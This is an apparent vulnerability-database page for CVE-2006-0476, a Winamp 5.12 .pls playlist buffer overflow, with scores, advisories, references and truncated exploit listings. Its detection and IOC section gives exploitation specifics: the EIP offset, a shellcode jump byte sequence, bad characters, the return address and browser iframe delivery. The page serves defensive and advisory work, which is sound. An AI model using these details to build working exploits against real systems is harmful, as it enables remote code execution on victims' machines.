CVE-2006-0476
Published 2006-01-31
CVE-2006-0476: Buffer overflow in Nullsoft Winamp 5.12 allows remote attackers to execute arbitrary code via a playlist (pls) file with a long file name (File1 field).
Priority P3 · 54 · high · CVSS 2.0 base score 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C)
Exploit available
EPSS 74.51% (99.4th percentile)
Affected (18 ranges listed for the same vendor and product; none carries version bounds on this page)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| nullsoft | winamp | — | — |
Detection & IOCs (extracted from sources)
Byte pattern (jump-to-shellcode sequence): \x61\xD9\x02\x02\x83\xEC\x34\x83\xEC\x70\xFF\xE4
Byte pattern (ESP-restore prefix, XCHG ECX,ESP): \x87\xe1
- Malicious .pls playlist file, delivered via the browser, whose File1= field contains a UNC path (\\<long_computer_name>) with a computer name of roughly 1026 bytes; EIP is overwritten at offset 1022.
- Detection: flag .pls playlist files where a File<N>= field begins with \\ (UNC path) and the computer-name component exceeds 1022 bytes; this is indicative of buffer overflow exploitation.
- Payload bad characters for this exploit are null byte, backslash, forward slash, CR, LF and space (\x00\x5c\x2f\x0a\x0d\x20); encoded shellcode placed in the .pls UNC field will avoid these bytes.
- The exploit prepends \x87\xe1 (XCHG ECX,ESP) to the payload encoder to restore ESP from ECX, because landing on the \x5c\x5c UNC prefix trashes ESP; this two-byte sequence at the start of shellcode in a .pls file is a strong indicator.
- The Metasploit module supports a PlaylistSpaceInjection evasion option that inserts random spaces and tabs around keys and values in the playlist; detection should therefore also cover .pls files with abnormal whitespace around the '=' delimiters.
- The jump-to-shellcode sequence \x61\xD9\x02\x02\x83\xEC\x34\x83\xEC\x70\xFF\xE4 appears at a fixed offset within the malicious .pls UNC computer-name field; scan .pls file content for this byte pattern.
- The Metasploit return address (0x0d45fece) is specific to Winamp 5.12 Universal only; the byte 0x0d is replaced by 0x00 during processing, which is an intentional exploit design detail.
- The Metasploit module was only successfully tested against Winamp 5.11 and 5.12; the payload space is limited to 526 bytes.
- NOP sleds are explicitly disabled in the Metasploit payload configuration so that the ECX register, which is used for ESP restoration, is not modified.
GHSA-249v-jf5r-cp5r (CVE-2006-0708, HIGH, CVSS 7.6, ghsa_unreviewed, 2022-05-01): Multiple buffer overflows in NullSoft Winamp 5
Multiple buffer overflows in NullSoft Winamp 5.13 and earlier allow remote attackers to execute arbitrary code via (1) an m3u file containing a long URL ending in .wma, (2) a pls file containing a File1 field with a long URL ending in .wma, or (3) an m3u file with a long filename, variants of CVE-2005-3188 and CVE-2006-0476.
GHSA-jv33-3xgx-xjg2 (CVE-2006-0476, HIGH, ghsa_unreviewed, 2022-05-01): Buffer overflow in Nullsoft Winamp 5
Buffer overflow in Nullsoft Winamp 5.12 allows remote attackers to execute arbitrary code via a playlist (pls) file with a long file name (File1 field).
GHSA-8jv5-qc9q-5qfw (CVE-2005-3188, HIGH, CVSS 7.6, ghsa_unreviewed, 2022-05-01): Buffer overflow in Nullsoft Winamp 5
Buffer overflow in Nullsoft Winamp 5.094 allows remote attackers to execute arbitrary code via (1) an m3u file containing a long line ending in .wma or (2) a pls file containing a long File1 value ending in .wma, a different vulnerability than CVE-2006-0476.
No detection rules found.
Exploit-DB: Winamp - Playlist UNC Path Computer Name Overflow (Metasploit) (CVE-2006-0476, exploitdb, 2010-04-30)
---
```ruby
##
# $Id: winamp_playlist_unc.rb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
  # The text between the class declaration and the 'Name' entry was lost
  # in extraction (the angle bracket was parsed as markup); the standard
  # HttpServer::HTML mixin and initialize/update_info scaffolding are assumed.
  include Msf::Exploit::Remote::HttpServer::HTML
  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Winamp Playlist UNC Path Computer Name Overflow',
      'Description' => %q{
        This module exploits a vulnerability in the Winamp media player.
        This flaw is triggered when an audio file path is specified, inside a
        playlist, that consists of a UNC path with a long computer name. This
        module delivers the playlist via the browser. This module has only
        been successfully test
```
(listing truncated on the source page)
Exploit-DB: Winamp 5.12 - '.pls' Remote Buffer Overflow (Perl) (2) (CVE-2006-0476, exploitdb, 2007-03-07)
---
```perl
#!/usr/bin/perl -w
# ===============================================================================================
# Winamp 5.12 Playlist UNC Path Computer Name Overflow Perl Exploit
# By Umesh Wanve ([email protected])
# ===========================================================================================================================
# Credits : ATmaCA is credited with the discovery of this vulnerability.
#
# Date : 07-03-2007
#
# Tested on Windows 2000 SP4 Server English
#           Windows 2000 SP4 Professional English
#
# You can replace shellcode with your favourite one :)
#
#
# Buffer = "\x90" x 1023 + EIP
#
# Desc: you can't put shellcode after EIP. No more space after this. Winamp simply crashes. When you debug it,
```
(listing truncated on the source page)
Exploit-DB: Winamp 5.12 - '.pls' Remote Buffer Overflow (Metasploit) (CVE-2006-0476, exploitdb, 2006-01-31)
---
```perl
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::winamp_playlist_unc;
use strict;
use base "Msf::Exploit";
use Pex::Text;
use IO::Socket::INET;
use IPC::Open3;
my $advanced =
{
  'Gzip'    => [1, 'Enable gzip content encoding'],
  'Chunked' => [1, 'Enable chunked transfer encoding'],
  'Humor'   => [0, 'Enable humorous song names'],
};
my $info =
{
  'Name' => 'Winamp Playlist UNC Path Computer Name Overflo
```
(listing truncated on the source page)
Exploit-DB: Winamp 5.12 - '.pls' Remote Buffer Overflow (1) (CVE-2006-0476, exploitdb, 2006-01-29)
---
```c
/*
 *
 * Winamp 5.12 Remote Buffer Overflow Universal Exploit (Zero-Day)
 * Bug discovered & exploit coded by ATmaCA
 * Web: http://www.spyinstructors.com && http://www.atmacasoft.com
 * E-Mail: [email protected]
 * Credit to Kozan
 *
 */
/*
 *
 * Tested with :
 * Winamp 5.12 on Win XP Pro Sp2
 *
 */
/*
 * Usage:
 *
 * Execute exploit, it will create "crafted.pls" in current directory.
 * Double-click the file, or right-click it and then select "open".
 * And Winamp will launch a Calculator (calc.exe)
 *
 */
/*
 *
 * To use it remotely,
 * make a html page containing an iframe linking to the .pls file.
 *
 * http://www.spyinstructors.com/atmaca/research/winamp_ie_poc.htm
 *
 */
/* The header names were lost in extraction (angle brackets parsed as
 * markup); stdio.h and string.h are assumed here. */
#include <stdio.h>
#include <string.h>
#define BUF_LEN 0x045D
#define PLAYLIST_FILE "crafted.pl
```
(listing truncated on the source page)
Metasploit: Winamp Playlist UNC Path Computer Name Overflow
This module exploits a vulnerability in the Winamp media player. This flaw is triggered when an audio file path is specified, inside a playlist, that consists of a UNC path with a long computer name. This module delivers the playlist via the browser. This module has only been successfully tested on Winamp 5.11 and 5.12.
No writeups or analysis indexed.
References
- http://secunia.com/advisories/18649
- http://securityreason.com/securityalert/386
- http://securityreason.com/securityalert/398
- http://securitytracker.com/id?1015552
- http://www.heise.de/newsticker/meldung/68981
- http://www.kb.cert.org/vuls/id/604745
- http://www.osvdb.org/22789
- http://www.securityfocus.com/archive/1/423436/100/0/threaded
- http://www.securityfocus.com/archive/1/423548/100/0/threaded
- http://www.securityfocus.com/bid/16410
- http://www.us-cert.gov/cas/techalerts/TA06-032A.html
- http://www.vupen.com/english/advisories/2006/0361
- http://www.winamp.com/player/version_history.php
- https://exchange.xforce.ibmcloud.com/vulnerabilities/24361
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1402
- https://www.exploit-db.com/exploits/3422